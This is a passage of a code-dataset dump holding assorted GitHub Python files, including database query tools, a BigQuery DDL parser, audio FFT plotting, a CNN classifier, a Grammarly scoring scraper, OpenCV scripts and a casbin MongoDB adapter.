catSearch.group(1)\n if (cat == ca):\n ca_aids.append(top[0].decode(\"utf-8\"))\n top = adCursor.next()\n return ca_aids\n\ndef part(pte,teCursor,adCursor,opt):\n pte = pte.lower()\n top = teCursor.first()\n pt_aids = []\n while (top != None):\n te = str(top[0].decode(\"utf-8\"))\n pmatch = re.search(str(pte)+'(.*)',te)\n if pmatch:\n if str(top[1].decode(\"utf-8\")).split('\\n')[0] not in pt_aids:\n pt_aids.append(str(top[1].decode(\"utf-8\")).split('\\n')[0])\n top = teCursor.next()\n return pt_aids\n\n\ndef queryType(query,teCursor,daCursor,adCursor,prCursor,opt):\n partQuery = re.match('(.*)%',query)\n dateGreaterEqualQuery = re.match('date>=(.*)',query)\n dateLessEqualQuery = re.match('date<=(.*)',query)\n dateGreaterQuery = re.match('date>(.*)',query)\n dateEqualQuery = re.match('date=(.*)',query)\n dateLessQuery = re.match('date<(.*)',query)\n locationQuery = re.match('location=(.*)',query)\n catQuery = re.match('cat=(.*)',query)\n priceEqualQuery = re.match('price=(.*)',query)\n priceGreaterEqualQuery = re.match('price>=(.*)',query)\n priceLessEqualQuery = re.match('price<=(.*)',query)\n priceGreaterQuery = re.match('price>(.*)',query)\n priceLessQuery = re.match('price<(.*)',query)\n \n if dateLessEqualQuery:\n return dateLessEqual(dateLessEqualQuery.group(1),daCursor,adCursor,opt)\n elif dateEqualQuery:\n return dateEqual(dateEqualQuery.group(1),daCursor,adCursor,opt)\n elif dateGreaterEqualQuery:\n return dateGreaterEqual(dateGreaterEqualQuery.group(1),daCursor,adCursor,opt)\n elif dateLessQuery:\n return dateLess(dateLessQuery.group(1),daCursor,adCursor,opt)\n elif dateGreaterQuery:\n return dateGreater(dateGreaterQuery.group(1),daCursor,adCursor,opt)\n \n elif catQuery:\n return cat(catQuery.group(1),adCursor,opt)\n \n elif locationQuery:\n return location(locationQuery.group(1),adCursor,opt)\n \n elif priceEqualQuery:\n return priceEqual(priceEqualQuery.group(1),prCursor,adCursor,opt)\n elif priceGreaterEqualQuery:\n return priceGreaterEqual(priceGreaterEqualQuery.group(1),prCursor,adCursor,opt)\n elif priceLessEqualQuery:\n return priceLessEqual(priceLessEqualQuery.group(1),prCursor,adCursor,opt)\n elif priceGreaterQuery:\n return priceGreater(priceGreaterQuery.group(1),prCursor,adCursor,opt)\n elif priceLessQuery:\n return priceLess(priceLessQuery.group(1),prCursor,adCursor,opt)\n \n elif partQuery:\n return part(partQuery.group(1),teCursor,adCursor,opt)\n else:\n return teQuery(query,teCursor,adCursor,opt)\n\ndef main():\n adsDB = db.DB()\n termsDB = db.DB()\n pdatesDB = db.DB()\n pricesDB = db.DB()\n adsDB.open('ad.idx',None,db.DB_HASH,db.DB_CREATE)\n termsDB.open('te.idx',None,db.DB_BTREE,db.DB_CREATE)\n pdatesDB.open('da.idx',None,db.DB_BTREE,db.DB_CREATE)\n pricesDB.open('pr.idx',None,db.DB_BTREE,db.DB_CREATE)\n\n adCursor = adsDB.cursor()\n teCursor = termsDB.cursor()\n daCursor = pdatesDB.cursor()\n prCursor = pricesDB.cursor()\n\n opt = 0\n \n while(True):\n querys = input(\"Enter query: \") \n \n outSearch = re.search('output=(.*)',querys)\n if outSearch:\n option = outSearch.group(1)\n if option == \"full\":\n opt = 1\n elif option == \"brief\":\n opt = 0\n else:\n print(\"invalid option\")\n break\n else:\n querys = querys.split()\n entries = []\n tr = 0\n for query in querys:\n query = query.lower()\n if (queryType(query,teCursor,daCursor,adCursor,prCursor,opt) != []) and (queryType(query,teCursor,daCursor,adCursor,prCursor,opt) != None):\n entries.append(queryType(query,teCursor,daCursor,adCursor,prCursor,opt))\n else:\n print(\"no matching entries\")\n tr = 1\n break\n\n if tr == 0:\n if len(entries) != 0:\n final_entries = []\n for i in range(len(entries)):\n for j in range(len(entries[i])):\n ein = 1\n for e in entries:\n if entries[i][j] not in e:\n ein = 0\n break\n if ein == 1:\n if entries[i][j] not in final_entries:\n final_entries.append(entries[i][j])\n if opt == 0:\n get_title(final_entries,adCursor)\n elif opt == 1:\n get_ad(final_entries,adCursor)\n \n\n\n \n adsDB.close()\n termsDB.close()\n pdatesDB.close()\n pricesDB.close()\n adCursor.close()\n teCursor.close()\n daCursor.close()\n prCursor.close()\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"phoebebai/CMPUT291-mini-project2","sub_path":"phase3.py","file_name":"phase3.py","file_ext":"py","file_size_in_byte":15752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"37445531223","text":"import logging\nimport re\nfrom re import Match\nfrom typing import Dict, List\nfrom common.bigquery_type import BigQueryType\nfrom common.file_reader import read\n\nlogger = logging.getLogger(__name__)\n\n\nclass DDLParser:\n\n def __init__(self, ddl_path):\n ddl: List[str] = read(ddl_path).split(\"\\n\")\n # We only care about the `CREATE TABLE` DDL\n if ddl[0].startswith(\"CREATE SCHEMA\"):\n ddl = ddl[1:]\n\n self._schema: Dict[str, BigQueryType] = self._to_schema(ddl)\n self._fully_qualified_table_name = self._to_fully_qualified_table_name(\n ddl[0]\n )\n\n def get_schema(self) -> Dict[str, BigQueryType]:\n return self._schema\n\n def get_fully_qualified_table_name(self):\n return self._fully_qualified_table_name\n\n @staticmethod\n def _to_fully_qualified_table_name(ddl: str) -> str:\n match: Match = re.search(\"CREATE TABLE `(.*)`\", ddl)\n if match:\n return match.group(1)\n\n @staticmethod\n def _to_schema(ddl: List[str]) -> Dict[str, BigQueryType]:\n ddl = [line.strip() for line in ddl]\n columns_start_index = ddl.index(\"(\")\n\n try:\n columns_end_index = ddl.index(\")\")\n except ValueError:\n try:\n columns_end_index = ddl.index(\");\")\n except ValueError:\n raise ValueError(\n \"Couldn't parse schema file. Make sure this file is generated by\"\n \" the response of `fetch_bigquery_table_schema.py`\"\n )\n\n if \"PRIMARY KEY\" in ddl[columns_end_index - 1]:\n columns_end_index -= 1\n\n schema = ddl[columns_start_index + 1 : columns_end_index]\n\n return DDLParser._to_dict(schema)\n\n @staticmethod\n def _to_dict(schema):\n d = {}\n for column in schema:\n column = DDLParser._strip_trailing_comma(column.strip())\n name: str = DDLParser._column_name(column)\n\n if DDLParser._is_metadata_column(name):\n logger.debug(f\"Skipping metadata column {column}\")\n continue\n\n try:\n source_type: BigQueryType = DDLParser._column_schema(column)\n except ValueError:\n raise ValueError(\n \"Expected column description to in the format of '\"\n f\" ' but got: '{column}'\"\n )\n d[name] = source_type\n\n return d\n\n @staticmethod\n def _strip_trailing_comma(s: str):\n return s[:-1] if s[-1] == \",\" else s\n\n @staticmethod\n def _is_metadata_column(column: str):\n return column.startswith(\"_metadata_\") or column == \"datastream_metadata\"\n\n @staticmethod\n def _column_schema(column: str) -> BigQueryType:\n column_schema = column.split()[1:]\n if column_schema[0].startswith(\"NUMERIC\"):\n return BigQueryType.NUMERIC\n elif column_schema[0].startswith(\"BIGNUMERIC\"):\n return BigQueryType.BIGNUMERIC\n elif column_schema[0].startswith(\"STRING\"):\n return BigQueryType.STRING\n else:\n return BigQueryType(column_schema[0])\n\n @staticmethod\n def _column_name(column: str):\n return column.split()[0].strip(\"`\")\n","repo_name":"GoogleCloudPlatform/datastream-bigquery-migration-toolkit","sub_path":"migration_toolkit/sql_generators/copy_rows/ddl_parser.py","file_name":"ddl_parser.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"43471634175","text":"import pyaudio\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.lines as line\nimport threading\nimport wave\nimport Queue\nfrom scipy import signal\n\nclass recorder():\n \n def __init__(self):\n self.CHUNK = 4096 \n self.FORMAT = pyaudio.paInt16\n self.CHANNELS = 1\n self.RATE = 48100\n self.RECORD_SECONDS = 0.1\n self.window = signal.hamming(self.CHUNK)\n self.fig = plt.figure()\n self.real_time_axis = plt.subplot(212,xlim =(0,self.CHUNK),ylim =(-10000,10000)) #creating a plot for real time\n self.real_time_axis.set_title(\"Real Time\")\n self.real_time_line = line.Line2D([],[])\n self.real_time_data = np.arange(0,self.CHUNK,1)\n self.real_time_x_data = np.arange(0,self.CHUNK,1)\n plt.yticks(np.arange(-10000,10000,1000))\n self.fft_axis = plt.subplot(211,xlim =(0,self.CHUNK/2+1),ylim =(1,1000000)) #creating a plot for fft\n self.fft_axis.set_title(\"FFT Time\")\n self.fft_line = line.Line2D([],[])\n self.fft_data = np.arange(0,self.CHUNK/2+1,1)\n self.fft_x_data = np.arange(0,self.CHUNK/2+1,1)\n plt.xticks(np.arange(0,self.CHUNK/2+1, 100))\n plt.axis([0,500,1,1000000])\n \n#Real time plotting on the graph \n def plot_ini(self):\n self.real_time_axis.add_line(self.real_time_line)\n self.fft_axis.add_line(self.fft_line)\n return self.fft_line,self.real_time_line\n \n def plot_up(self,frame):\n self.real_time_line.set_xdata(self.real_time_x_data)\n self.real_time_line.set_ydata(self.real_time_data)\n self.fft_line.set_xdata(self.fft_x_data)\n self.fft_line.set_ydata(self.fft_data)\n return self.fft_line, self.real_time_line\n \n def anim(self):\n self.ani = animation.FuncAnimation(self.fig, self.plot_up, init_func = self.plot_ini,\n frames = 1, interval = 30, blit = False)\n#Sound Recording and Microphone init\n def rec(self):\n self.p = pyaudio.PyAudio()\n self.q = Queue.Queue()\n\n def callBack(self,in_data, frame_count, time_info, status):\n self.q.put(in_data)\n self.audioRec.set()\n return(None,pyaudio.paContinue)\n\n def recStart(self):\n self.stream = self.p.open(format = self.FORMAT, channels = self.CHANNELS, rate = self.RATE,\n input = True, output = False, frames_per_buffer = self.CHUNK,\n stream_callback = self.callBack)\n self.stream.start_stream()\n#Main processing\n def threaded_recording(self): \n while self.stream.is_active():\n self.audioRec.wait(timeout=1000)\n if not self.q.empty():\n self.data = self.q.get()\n while not self.q.empty():\n self.q.get()\n self.real_time_data = np.frombuffer(self.data,np.dtype(' 127, 0, 1)\r\n return img, label\r\n\r\n## Call the function process path to get img and label from the glob of directory\r\n## Autotune = based on your cpu or gpu performance\r\ntrain_ds = train_ds.map(process_path, num_parallel_calls=AUTOTUNE)\r\nval_ds = val_ds.map(process_path, num_parallel_calls=AUTOTUNE)\r\n\r\n## This function created for increasing the performance when call the img and label for futher operation\r\ndef configure_for_performance(ds):\r\n ds = ds.cache()\r\n ds = ds.shuffle(buffer_size=1000)\r\n ds = ds.batch(batch_size)\r\n ds = ds.prefetch(buffer_size=AUTOTUNE)\r\n return ds\r\n\r\n## Call the performance function and separate image and label on both training dataset and validation dataset\r\ntrain_ds = configure_for_performance(train_ds)\r\nval_ds = configure_for_performance(val_ds)\r\ntrain_images, train_labels = next(iter(train_ds))\r\nval_images, val_labels = next(iter(val_ds))\r\n\r\n## Creating Convolutional Neural Network Model\r\nmodel = models.Sequential()\r\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(32, 32, 1)))\r\nmodel.add(layers.MaxPooling2D((2, 2)))\r\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\r\nmodel.add(layers.MaxPooling2D((2, 2)))\r\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\r\n\r\nmodel.add(layers.Flatten())\r\nmodel.add(layers.Dense(64, activation='relu'))\r\nmodel.add(layers.Dense(20, activation='softmax'))\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n## Training The Model\r\nhistory = model.fit(train_images, train_labels, epochs=10, validation_data=(val_images,val_labels))\r\n\r\n## Evaluating The Model\r\nmodel_loss, model_acc = model.evaluate(train_ds, verbose=2)\r\n\r\n## Predicting the 10 first images from the validation dataset \r\npredictions = model.predict(val_images)\r\n\r\n## Sketch the graph on accuracy of the model\r\nplt.plot(history.history['accuracy'], label='accuracy')\r\nplt.plot(history.history['val_accuracy'], label = 'val_accuracy')\r\nplt.xlabel('Epoch')\r\nplt.ylabel('Accuracy')\r\nplt.ylim([0.5, 1])\r\nplt.legend(loc='lower right')\r\n\r\n## Taking all of the result from prediction to make the graph later\r\ni = 1; result_t = [0 for i in range(len(class_names))]; result_f = [0 for i in range(len(class_names))]\r\nfor i in range(len(predictions)):\r\n if np.argmax(predictions[i]) == val_labels[i]:\r\n result_t[val_labels[i]]+=1\r\n else:\r\n \tresult_f[val_labels[i]]+=1 \r\n\r\n## Creating the graph on how much the model can recognize 20 javanese character\r\nx = np.arange(len(class_names))\r\nwidth = 0.35\r\nfig,ax = plt.subplots()\r\nrects1 = ax.bar(x - width/2, result_t, width, label='True')\r\nrects2 = ax.bar(x + width/2, result_f, width, label='False')\r\nax.set_ylabel('Value')\r\nax.set_title('Summary')\r\nax.set_xticks(x, class_names)\r\nax.legend()\r\n\r\nax.bar_label(rects1, padding=3)\r\nax.bar_label(rects2, padding=3)\r\n\r\nfig.tight_layout()\r\nplt.show()\r\n","repo_name":"L200164012/JavaneseCharacterCNN-RT","sub_path":"CNN_JavaneseCharacterSummary.py","file_name":"CNN_JavaneseCharacterSummary.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14253849550","text":"# 숫자문자열과 영단어 \n\ndef solution(s):\n answer = 0\n num_dict = {\"zero\":0, \"one\":1, \"two\":2, \"three\":3, \"four\":4, \"five\":5,\n \"six\":6, \"seven\":7, \"eight\":8, \"nine\":9 }\n \n for k in list(num_dict.keys()):\n if k in s:\n s = s.replace(k, str(num_dict[k]))\n\n return int(s)","repo_name":"woohree/ALGO2ITHM_STUDY","sub_path":"programmers/0207_lv.1_81301_숫자문자열과영단어/yeonggyeong.py","file_name":"yeonggyeong.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"11542152015","text":"# -*- coding: utf-8 -*-\n\"\"\"\nAnalysis of integration setting results\nCreated on Wed Apr 1 14:30:53 2020\n\n@author: Jurriez\n\"\"\"\n\nfrom os import getcwd\nfrom os import chdir\nimport sys \nimport numpy as np\nimport matplotlib.pyplot as pp\n\nsys.path.append('../')\nchdir('../')\nimport DataImport as DI\nimport GeneralFunctions as GF\nimport LazyLib as LL\nimport PlottingFunctions as PF\nchdir('IntegratorAnalysis/')\n\n#%% SETTINGS\n# Draw 3d plots of motion relative to L4 in barycentric frame, needs large time scales to show effects\nbarycentricL4MotionComparison = False;\n\naddendum = \"_5\"\n# Number of cases to be taken into account\nnumcases = 5\n\n\n#%% Data import\nchdir(\"../\")\ncwd = getcwd()\nappend = cwd + \"/Data/\"\n\nprint(\"Start synchronizing data files to folder %s\" % append)\nLL.SyncDataFiles(targetDir = append)\nprint(\"Synchronized data files\")\n\n# x,y,z,vx,vy,vz, R, V = (np.ndarray([]) for i in range(0,8))\n\ndatafolder = cwd + '/Data/IntegratorAnalysis/'\n\nmadevars = False\n\nlist_t, list_x, list_y, list_z = ([] for i in range(0,4))\nlist_Bx, list_By,list_Bz = ([] for i in range(0,3))\nfor i in range( 0 , numcases):\n filename = datafolder + \"propagationHistory_\" + str(i) + addendum + \".dat\"\n \n t, xd, yd, zd, vxd, vyd, vzd, md = DI.ImportPropagationHistory(filename,1, True)\n list_t.append(t)\n list_x.append(xd)\n list_y.append(yd)\n list_z.append(zd)\n \n if madevars == False:\n Bx, By, Bz = (np.NaN*np.zeros((xd.shape[0],1,numcases)) for i in range(0,3))\n Dx,Dy,Dz,DBx, DBy, DBz, DR, DBR = (np.NaN*np.zeros((xd.shape[0],2,numcases)) \n for i in range(0,8))\n madevars = True\n\n list_Bx.append( xd[:,0] - xd[:,1])\n list_By.append( yd[:,0] - yd[:,1])\n list_Bz.append( zd[:,0] - zd[:,1])\n if len(list_t[i]) > len(list_t[0]):\n mask = np.in1d(list_t[i],list_t[0])\n Dx[:,:,i] = list_x[0] - list_x[i][mask,:]\n Dy[:,:,i] = list_y[0] - list_y[i][mask,:]\n Dz[:,:,i] = list_z[0] - list_z[i][mask,:]\n DBx[:,0,i] = list_Bx[0] - list_Bx[i][mask]\n DBy[:,0,i] = list_By[0] - list_By[i][mask]\n DBz[:,0,i] = list_Bz[0] - list_Bz[i][mask]\n else: \n mask = np.in1d(list_t[0],list_t[i])\n Dx[mask,:,i] = list_x[0][mask,:] - list_x[i]\n Dy[mask,:,i] = list_y[0][mask,:] - list_y[i]\n Dz[mask,:,i] = list_z[0][mask,:] - list_z[i]\n DBx[mask,0,i] = list_Bx[0][mask] - list_Bx[i]\n DBy[mask,0,i] = list_By[0][mask] - list_By[i]\n DBz[mask,0,i] = list_Bz[0][mask] - list_Bz[i]\n \n DR[:,:,i] = np.sqrt(Dx[:,:,i]**2+Dy[:,:,i]**2+Dz[:,:,i]**2)\n DBR[:,0,i] = np.sqrt(DBx[:,0,i]**2+DBy[:,0,i]**2+DBz[:,0,i]**2)\nt -= t[0]\n\n#%% Plot preparation\n#Dr[Dr == 0] = np.NaN\n\nPF.clearPlots()\n\nbase = float(addendum[1:])\nf1 = np.round(base/4,1)\nf2 = np.round(base/2,1)\nf3 = np.round(base*2,1)\nf4 = np.round(base*4,1)\n\nlegend = [str(base) + \" minute time steps\",\n str(f1) +\" minute time steps\",\n str(f2) + \" minute time steps\",\n str(f3) +\" minute time steps\",\n str(f4) +\" minute time steps\"\n ]\n\nstyles = [None, None, None, None, None]\n\n#%% Do the plotting\n\n# Get proper output folder directory to save figures in\nd = LL.folder_dict[\"NumericalSim\"]\nd = LL.folder_dict_funcs[\"RK4\"]\nLL.CheckDir(d)\n\nmax1 = np.max(DR[np.isfinite(DR)])\nmax2 = np.max(DBR[np.isfinite(DBR)])\n\norder = np.max([np.ceil(np.log10(max1)),np.ceil(np.log10(max2))])\n\nylim = [1e-6, 10**order]\n\nfig, ax = PF.Matrix2DPlot(list_t[0],DR[:,:,1:], title=\"Changes in satellite positions with respect to \"+ addendum[1:]+ \" minute step size\",\n xlabel = 't[days]',ylabel='change [m]', xmod=24*3600,ymod = 1,ylim = ylim,\n savefig = True, figfolder = d, name=\"Changes Satellite Position\" + addendum[1:] + \"m\",\n legendlist = legend[1:], stylelist = styles,\n logScale = True, figsize=(14,8))\n\nfig, ax = PF.Matrix2DPlot(list_t[0],DBR[:,0,1:], title=\"Changes in satellite baselines with respect to \"+ addendum[1:]+ \" minute step size\",\n xlabel = 't[days]',ylabel='change [m]', xmod=24*3600,ymod = 1,ylim = ylim,\n savefig = True, figfolder = d, name=\"Changes Satellite Baseline\" + addendum[1:] + \"m\",\n legendlist = legend[1:], stylelist = styles,\n logScale = True, figsize=(14,8))\n","repo_name":"JaHoff/ThesisPython","sub_path":"Integrator Analysis/RK4 Analysis.py","file_name":"RK4 Analysis.py","file_ext":"py","file_size_in_byte":4375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2009943171","text":"import pika, json\nfrom .models import SentEmail\n\n\ndef send_email(message, channel: pika.adapters.blocking_connection.BlockingChannel, sent_email: SentEmail):\n \"\"\"\n Publish a message to the RabbitMQ message broker using the provided channel.\n\n Args:\n message (dict): A dictionary containing the email message to be sent.\n channel (pika.adapters.blocking_connection.BlockingChannel): A channel to the RabbitMQ message broker.\n sent_email (SentEmail): A SentEmail object that represents the email being sent.\n\n Returns:\n str or None: Returns None if the message was successfully published to the broker, otherwise an error message\n as a string.\n \"\"\"\n try:\n channel.basic_publish(\n exchange=\"\",\n routing_key=\"email\",\n body=json.dumps(message),\n properties=pika.BasicProperties(\n delivery_mode=pika.spec.PERSISTENT_DELIVERY_MODE\n ),\n )\n except Exception as err:\n # delete removes entries from many-to-many table relating to recipients\n sent_email.delete()\n print(f\"caught exception while putting message to rabbitMq\")\n return str(err), 500\n","repo_name":"kirantyefun/email-system-microservice","sub_path":"EmailSystem/emails/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38614494764","text":"import cv2 as cv\r\nimport numpy as np\r\nface_cascade=cv.CascadeClassifier('haarcascade_frontalface_default.xml')\r\nimg=cv.imread('lena.png')\r\ngrey=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\r\nfaces=face_cascade.detectMultiScale(grey,1.1,4)\r\nfor (x,y,w,h) in faces:\r\n cv.rectangle(img,(x,y),(x+h,y+w),(0,255,0),thickness=2)\r\n\r\ncv.imshow('output',img)\r\ncv.waitKey()\r\ncv.destroyAllWindows()","repo_name":"Madhan13K/opencv_programs","sub_path":"opencv_projects/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2776509943","text":"import numpy as np\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\n\nX = np.loadtxt(\"embeddings\");\n# print(X[0])\nlabels = []\nwith open('labels') as output:\n\tfor line in output:\n\t\tlabels.append(line.split('resource/')[1].strip())\n\ntsne = TSNE(n_components=2, random_state=0)\nY = tsne.fit_transform(X[:3000])\n\nfig, ax = plt.subplots()\nax.scatter(Y[:,0], Y[:,1]);\n\nfor i, txt in enumerate(labels):\n\tif i == 3000:\n\t\tbreak\n\tax.annotate(txt.decode(\"utf-8\"), (Y[i,0], Y[i,1]))\nplt.show()\n","repo_name":"dbpedia/embeddings","sub_path":"gsoc2017-akshay/tsne.py","file_name":"tsne.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"79"} +{"seq_id":"16437529680","text":"#Count letters in the given string and store the counts as dictionary\n\na = 'aabbccdddeeepppsssvvvvggggllllll'\nd = {}\n\nfor letter in a:\n #d_items = d.keys()\n #print([0][0])\n #print(letter)\n if letter in d.keys():\n d[letter] += 1\n else:\n d[letter] = 1\nprint(d)\n\n","repo_name":"vandanagarg/practice_python","sub_path":"learning_python/data_structures/dictionaries/count_letters.py","file_name":"count_letters.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"43694915014","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom fake_useragent import UserAgent\nfrom tqdm import tqdm\nimport time\nimport os\nimport csv\n\nimport personal_info\n\nLOGIN = personal_info.LOGIN\nPASSWORD = personal_info.PASSWORD\n\n'''\n0-5 - A1\n6-10 - A2_minus\n11-20 - A2_main\n21-30 - B1_minus\n31-40 - B1_main\n41-50 - В2_minus\n51-60 - В2_main\n61-70 - С1\n71+ - С2\n'''\n\n\ndef calculate_level(x):\n if x in range(0, 6):\n return 'A1'\n elif x in range(6, 11):\n return 'A2'\n elif x in range(11, 41):\n return 'B1'\n elif x in range(41, 51):\n return 'B2'\n elif x in range(51, 71):\n return 'C1'\n elif x in range(71, 101):\n return 'C2'\n\n\ndef recalculate_level(x):\n if x in range(0, 6):\n return 'A1'\n elif x in range(6, 11):\n return 'A2_minus'\n elif x in range(11, 21):\n return 'A2_main'\n elif x in range(21, 31):\n return 'B1_minus'\n elif x in range(31, 41):\n return 'B1_main'\n elif x in range(41, 51):\n return 'B2_minus'\n elif x in range(51, 61):\n return 'B2_main'\n elif x in range(61, 71):\n return 'C1'\n elif x in range(71, 101):\n return 'C2'\n\n\ndef get_level(folder_path):\n global LOGIN, PASSWORD\n options = Options()\n ua = UserAgent()\n userAgent = ua.random\n options.add_argument(f'user-agent={userAgent}')\n driver = webdriver.Firefox(executable_path=r'/Users/mariabocharova/PycharmProjects/REALEC/firefoxdriver')\n driver.get('https://www.grammarly.com/signin')\n\n insert_email = driver.find_element_by_name('email').send_keys(LOGIN)\n continue_btn = driver.find_element_by_xpath(\"//button[@class='base_basic__1qybc base_colorGreen__2AdOl']\").click()\n time.sleep(5)\n\n insert_password = driver.find_element_by_name('password').send_keys(PASSWORD)\n sign_in = driver.find_element_by_xpath(\"//button[@class='base_basic__1qybc base_colorGreen__2AdOl']\").click()\n time.sleep(5)\n\n open_new_file = driver.find_element_by_xpath(\"//div[@data-name='new-doc-add-btn']\").click()\n time.sleep(5)\n\n for path in tqdm(os.listdir(folder_path)):\n with open('grammarly_results.csv', 'a') as csvf:\n writer = csv.writer(csvf, delimiter=',')\n with open(folder_path + '/' + path, 'r') as f:\n text = f.read()\n time.sleep(3)\n insert_text = driver.find_element_by_xpath(\n \"//div[@class='_9c5f1d66-denali-editor-editor ql-editor ql-blank']\").send_keys(text)\n time.sleep(10)\n score = int(driver.find_element_by_xpath(\n \"//div[@class='fhsusol _bec19051-header-performanceScoreFadeIn _48adf116-header-performanceScore']\"\n ).text)\n level = calculate_level(score)\n recalc_level = recalculate_level(score)\n writer.writerow([folder_path.split('/')[-1] + '/' + path, level, recalc_level])\n start_again = driver.find_element_by_xpath(\n '//div[@class=\"_9c5f1d66-denali-editor-editor ql-editor\"]'\n ).clear()\n csvf.close()\n\n\n# the absolute path to the folder\nfolder = '/Users/mariabocharova/PycharmProjects/REALEC/REALEC_texts'\nget_level(folder)\n","repo_name":"soimmary/REALEC","sub_path":"grammarly.py","file_name":"grammarly.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17287405589","text":"import asyncio\n\nfrom aiogram import Bot, Dispatcher\nfrom aiogram.fsm.storage.memory import MemoryStorage\nfrom aiogram.types import BotCommand, BotCommandScopeDefault\n\nimport config\nimport handlers\n\n\nasync def set_commands(bot: Bot):\n commands = [\n BotCommand(command=\"start\", description=\"start\"),\n BotCommand(command=\"stop\", description=\"stop\")\n ]\n await bot.set_my_commands(commands=commands, scope=BotCommandScopeDefault())\n\n\nasync def main():\n bot = Bot(token=config.TOKEN)\n dp = Dispatcher(storage=MemoryStorage())\n dp.include_router(handlers.main_router)\n await set_commands(bot)\n await bot.delete_webhook(drop_pending_updates=True)\n await dp.start_polling(bot, skip_updates=False, polling_manager=handlers.polling_manager)\n\n\nif __name__ == \"__main__\":\n asyncio.run(main())\n","repo_name":"dmitrijshero/test_multibot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22467283043","text":"# Camara de telefono para visión artificial\nimport cv2\nimport numpy as np\nurl = 'Tu dirección de IP/video'\ncp = cv2.VideoCapture(url)\nwhile (True):\n camera, frame = cp.read()\n if frame is not None:\n cv2.imshow('Frame', frame)\n q = cv2.waitKey(1)\n if q == ord('q'):\n break\n cv2.destroyAllWindows()","repo_name":"CosterBellido/Python-principiantes","sub_path":"Camara de telefono para visión artificial.py","file_name":"Camara de telefono para visión artificial.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12609019387","text":"command = \"\"\r\nstarted = False\r\n\r\nwhile True:\r\n command = input(\"> \").lower()\r\n if command == \"start\":\r\n if started:\r\n print(\"Car already started!\")\r\n else:\r\n started = True\r\n print(\"Car has been started\")\r\n elif command == \"stop\":\r\n if started:\r\n print(\"Car has been stopped\")\r\n else:\r\n print(\"Car already stopped!\")\r\n elif command == \"quit\":\r\n break\r\n elif command == \"help\":\r\n print(\"\"\"\r\nstart - for starting the car\r\nstop - for stopping the car\r\nquit - for quiting the program\r\n \"\"\")\r\n else:\r\n print(\"Sorry, invalid input\")","repo_name":"GodPhoenix2003/Random-Python-Stuff","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"28611778183","text":"# copy from https://github.com/zhangbailong945/mongoengine_adapter/blob/master/casbin_mongoengine_adapter/adapter.py\nfrom casbin import persist\nfrom mongoengine import Document\nfrom mongoengine.fields import IntField, StringField\nfrom werkzeug.local import LocalProxy\nfrom exlib.flex import current_flex\n\n\nclass CasbinRule(Document):\n '''\n CasbinRule model\n '''\n\n __tablename__ = \"casbin_rule\"\n\n ptype = StringField(required=True, max_length=255)\n v0 = StringField(max_length=255)\n v1 = StringField(max_length=255)\n v2 = StringField(max_length=255)\n v3 = StringField(max_length=255)\n v4 = StringField(max_length=255)\n v5 = StringField(max_length=255)\n v6 = StringField(max_length=255)\n\n meta = {\"abstract\": True}\n\n def __str__(self):\n text = self.ptype\n if self.v0:\n text = text + ', ' + self.v0\n if self.v1:\n text = text + ', ' + self.v1\n if self.v2:\n text = text + ', ' + self.v2\n if self.v3:\n text = text + ', ' + self.v3\n if self.v4:\n text = text + ', ' + self.v4\n if self.v5:\n text = text + ', ' + self.v5\n if self.v6:\n text = text + ', ' + self.v6\n\n return text\n\n def __repr__(self):\n return ''.format(str(self))\n\n\nCurrentCasbinRule = LocalProxy(lambda: current_flex.casbin_rule_cls)\n\n\nclass Adapter(persist.Adapter):\n \"\"\"the interface for Casbin adapters.\"\"\"\n\n def __init__(self):\n \"\"\"\n 请自行连接mongo数据库,以免重复连接, 如:\n connect(dbname, host=host)\n \"\"\"\n pass\n\n def load_policy(self, model):\n '''\n implementing add Interface for casbin \\n\n load all policy rules from mongodb \\n\n '''\n lines = CurrentCasbinRule.objects()\n for line in lines:\n persist.load_policy_line(str(line), model)\n\n def _save_policy_line(self, ptype, rule):\n line = CurrentCasbinRule(ptype=ptype)\n if len(rule) > 0:\n line.v0 = rule[0]\n if len(rule) > 1:\n line.v1 = rule[1]\n if len(rule) > 2:\n line.v2 = rule[2]\n if len(rule) > 3:\n line.v3 = 